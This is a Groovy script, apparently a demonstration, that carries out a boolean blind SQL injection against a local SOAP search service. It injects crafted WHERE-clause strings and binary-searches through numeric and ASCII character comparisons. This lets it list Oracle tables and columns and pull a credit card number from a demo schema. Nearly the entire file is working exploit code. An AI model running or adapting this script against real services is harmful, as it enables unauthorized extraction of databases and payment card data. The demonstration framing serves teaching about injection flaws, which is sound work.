import groovyx.net.ws.WSClient
/*
Sample Script to read data via WHERE clause using SQL injection 
Jaromir D.B. Nemec
no liability; for demonstration purpose only; don't use on productive data!
*/

proxy = new WSClient("http://localhost:6983/MyService?WSDL", this.class.classLoader)
proxy.initialize()
static GOOD_KEY = 'Budweiser'
NOT_FOUND = 'Product not found'



def isFound (String s) {
// -----------------------
// returns true if the WS call with the parameter s finds some data
def ret =  proxy?.getName(s)  // call the search service
// check if some results found 
return !(ret.startsWith(NOT_FOUND))
} 

assert (isFound(GOOD_KEY)), "${GOOD_KEY} must be found!"
assert (!(isFound('XXX'))), "XXX MUST NOT be found!"
println "isFound passed!"

// get a number 
def getNumber(String positiveValue, String sqlText) {
// -------------------------------------------------------
// get a number as a result of execution on the select statement - sqlText
// parameters:
// positiveValue - a string that returns some data from the search service
// sqlText - a select statement returning a single number, 
// e.g. 'select count(*) from dual'
//
println "read a numeric value using injection string:"
println "${positiveValue}' and \${checkedNumber} > (${sqlText}) and '1'='1"
int guessLo = 0
// get an upper bound using power of 2
int guessHi = 2
// if the service returns a row then guessHi > target_number and we can quit the loop
print "starting with upper limit ... "
while (!(isFound("${positiveValue}' and ${guessHi} > (${sqlText}) and '1'='1"))) {
  guessHi = guessHi*2
} 
println guessHi
//
String x
while (guessLo < guessHi) {
  int check = guessLo + (guessHi - guessLo +1)/ 2
  print "testing ${check} ..."
  x = "${positiveValue}' and ${check} > (${sqlText}) and '1'='1"
  // if the service returns a row then check > target_number
  if (isFound(x))  {guessHi = check-1; println 'higher'} else
    {guessLo = check; println 'lower or equal'}
}
println "found ${guessLo}"
return guessLo 
}

assert (2 == getNumber(GOOD_KEY,'select count(*) from sqlinj.credit_card')), "count(*) from dual must be 2!"
println ">>> getNumber passed!"

// get String (VARCHAR2)
def getString(String positiveValue, String sqlText) {
// -------------------------------------------------------
// get a string (VARCHAR2) as a result of a select statement - sqlText
// positiveValue - a parameter that returns some data from the service
// sqlText - a select statement returning a single varchar2 column named text
// 
println "read a string value using injection string:"
println """${positiveValue}' and \${checkedASCIIValue} > 
 (select ascii(substr(text,\${i-thPosition},1)) from (${sqlText})) and '1'='1"""
// get the length of the string first
println "get the length of the string first..."
def length =  getNumber(positiveValue, "select length(text) from (${sqlText})")
// now get the string 
String res = ""
String x
// length loop
(1..length).each { i ->
  //println "guess the ${i}. position of the string"
  int  Lo = 32 // printable ASCII
  int Hi =  126
  while (Lo < Hi) {
    int check = Lo +  (Hi - Lo + 1)/ 2
    println "testing ${check} ..."
    x = """${positiveValue}' and ${check} > 
      (select ascii(substr(text,${i},1)) from (${sqlText})) and '1'='1"""
    // 
    if (isFound(x))  {Hi = ((char)((int)check)-1);  println 'higher'} else
      {Lo = check; println 'lower or equal'}
  }
  println "${i}. position = $Lo  ${((char)Lo)}"
  res += ((char)Lo)
}
println "found ${res}"
return res
}
// 

assert ('xxx' == getString(GOOD_KEY,"select 'xxx' as text from dual")),"getString does not work!"
println ">>> getString passed!"
//
def table_name  // now yes known, will be evaluated later...
def column_name

table_sql = 'select table_name, row_number() over (order by table_name) rn from all_tables  where owner = \'SQLINJ\''

println ">>> check the tables in schema"

// get 1st table - credit_card
table_name = getString(GOOD_KEY,"select table_name text from (${table_sql}) where rn = 1")
println ">>> the name of the first table is ${table_name}"

column_sql = "select column_name text, COLUMN_ID rn from all_tab_columns  where table_name = '${table_name}' and  owner = 'SQLINJ'"

println ">>> get column names of the table"
println ">>>>> ${table_name}"
println ">>>>> ${column_sql}"
println ">>>>> ${column_sql.dump()}"
println ">>>>> ${column_sql.class}"

l = getNumber(GOOD_KEY,"select count(*) from (${column_sql})")
println  ">>> the table ${table_name} has $l columns"

column_name = getString(GOOD_KEY,"select text from (${column_sql}) where rn = 1")
println ">>> the name of the first column is ${column_name}"
// get 2nd column
column_name = getString(GOOD_KEY,"select text from (${column_sql}) where rn = 2")
println ">>> the name of the second column is ${column_name}"

println ">>> table ${table_name} has ${getNumber(GOOD_KEY,"select count(*) from sqlinj.${table_name}")} rows"

// get CC number from 1st row
cc_sql = "select ${column_name} text, row_number() over (order by rowid) rn from sqlinj.${table_name}"

def cc_number = getString(GOOD_KEY,"select text from (${cc_sql}) where rn = 1")
println ">>> got CC number ${cc_number}"










